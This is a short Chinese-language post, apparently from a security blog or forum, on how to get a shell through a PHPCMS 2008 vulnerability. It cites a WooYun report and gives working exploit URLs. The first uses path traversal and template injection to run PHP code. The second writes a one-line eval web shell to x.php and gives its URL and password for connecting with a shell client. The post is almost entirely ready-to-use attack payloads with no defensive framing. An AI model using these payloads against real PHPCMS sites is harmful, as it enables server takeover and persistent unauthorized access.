关于phpcms 2008 getshell漏洞 拿shell

http://www.wooyun.org/bugs/wooyun-2010-09563

这个 注册企业会员 然后链接放exp info就出来了

EXP:http://localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php phpinfo();exit();?>

不过呢 写一句话 shell 那样的话 用菜刀链接 就不行。。

这里找到一个好方法 就是。。写在目录下面。。包含一句话

localhost/yp/business/?file=../../admin/block&action=post&blockid=eval&template=<?php fwrite(fopen(‘x.php’,'a’),’<?php @eval($_POST[m])?>’);exit();?>

链接方法： localhost/yp/business/x.php 密码 m